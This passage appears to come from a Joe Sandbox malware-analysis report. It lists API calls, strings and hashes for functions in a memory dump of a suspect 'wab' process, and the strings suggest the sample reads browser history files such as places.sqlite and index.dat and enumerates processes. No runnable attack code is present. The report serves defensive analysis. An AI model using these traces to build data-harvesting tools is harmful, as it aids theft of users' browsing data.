                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                              • FindCloseChangeNotification.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ChangeCloseFindNotificationSleep
                                                                                              • String ID: }A
                                                                                              • API String ID: 1821831730-2138825249
                                                                                              • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                              • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                              • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                              • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@DeleteObject
                                                                                              • String ID: r!A
                                                                                              • API String ID: 1103273653-628097481
                                                                                              • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                              • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                              • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                              • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??2@
                                                                                              • String ID:
                                                                                              • API String ID: 1033339047-0
                                                                                              • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                              • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                              • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                              • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                              • memcmp.MSVCRT ref: 00444BA5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$memcmp
                                                                                              • String ID: $$8
                                                                                              • API String ID: 2808797137-435121686
                                                                                              • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                              • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                              • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                              • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                • Part of subcall function 0040E01E: FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                                                              • FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                                                                                              • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                              • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                                                                                              • String ID:
                                                                                              • API String ID: 1042154641-0
                                                                                              • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                              • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                              • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                              • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                                                                • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                              • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                              • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                                                                                              • String ID:
                                                                                              • API String ID: 2947809556-0
                                                                                              • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                              • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                              • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                              • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                              • memset.MSVCRT ref: 00403A55
                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                                                                                              • String ID: history.dat$places.sqlite
                                                                                              • API String ID: 3093078384-467022611
                                                                                              • Opcode ID: 7e5fa77ffbd80df454c8f06c208cb8abd3a99e536342b00205f9bee392087e79
                                                                                              • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                              • Opcode Fuzzy Hash: 7e5fa77ffbd80df454c8f06c208cb8abd3a99e536342b00205f9bee392087e79
                                                                                              • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                              • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                              • GetLastError.KERNEL32 ref: 00417627
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$File$PointerRead
                                                                                              • String ID:
                                                                                              • API String ID: 839530781-0
                                                                                              • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                              • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                              • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                              • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFindFirst
                                                                                              • String ID: *.*$index.dat
                                                                                              • API String ID: 1974802433-2863569691
                                                                                              • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                              • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                              • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                              • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@mallocmemcpy
                                                                                              • String ID:
                                                                                              • API String ID: 3831604043-0
                                                                                              • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                              • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                              • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                              • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                              • GetLastError.KERNEL32 ref: 004175A2
                                                                                              • GetLastError.KERNEL32 ref: 004175A8
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$FilePointer
                                                                                              • String ID:
                                                                                              • API String ID: 1156039329-0
                                                                                              • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                              • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                              • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                              • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                              • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                              • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$ChangeCloseCreateFindNotificationTime
                                                                                              • String ID:
                                                                                              • API String ID: 1631957507-0
                                                                                              • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                              • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                              • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                              • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                              • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                              • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Temp$DirectoryFileNamePathWindows
                                                                                              • String ID:
                                                                                              • API String ID: 1125800050-0
                                                                                              • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                              • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                              • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                              • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: d
                                                                                              • API String ID: 0-2564639436
                                                                                              • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                              • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                              • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                              • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset
                                                                                              • String ID: BINARY
                                                                                              • API String ID: 2221118986-907554435
                                                                                              • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                              • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                              • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                              • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                                                              • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                              • FindCloseChangeNotification.KERNELBASE(?), ref: 00410654
                                                                                                • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
• String ID:
• API String ID: 1161345128-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Similarity
• API ID: _wcsicmp
• String ID: /stext
• API String ID: 2081463915-3817206916
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
• GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
• FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
Similarity
• API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
• String ID:
• API String ID: 159017214-0
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
• GetProcAddress.KERNEL32(?,00000000), ref: 00404453
• FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
Similarity
• API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
• String ID:
• API String ID: 3150196962-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
• failed to allocate %u bytes of memory, xrefs: 004152F0
Similarity
• API ID: malloc
• String ID: failed to allocate %u bytes of memory
• API String ID: 2803490479-1168259600
Uniqueness
Uniqueness Score: -1.00%

APIs
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Similarity
• API ID: memcmpmemset
• String ID:
• API String ID: 1065087418-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Similarity
• API ID: memset
• String ID:
• API String ID: 2221118986-0
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
  • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
  • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
  • Part of subcall function 0040A02C: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
• CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
Similarity
• API ID: File$Time$ChangeCloseCompareCreateFindNotificationmemset
• String ID:
• API String ID: 1481295809-0
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
• GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
Similarity
• API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
• String ID:
• API String ID: 3150196962-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
Similarity
• API ID: File$PointerRead
• String ID:
• API String ID: 3154509469-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
  • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
  • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
  • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
Similarity
• API ID: PrivateProfile$StringWrite_itowmemset
• String ID:
• API String ID: 4232544981-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary
                                                                                              • String ID:
                                                                                              • API String ID: 3664257935-0
                                                                                              • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                              • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                              • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                              • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
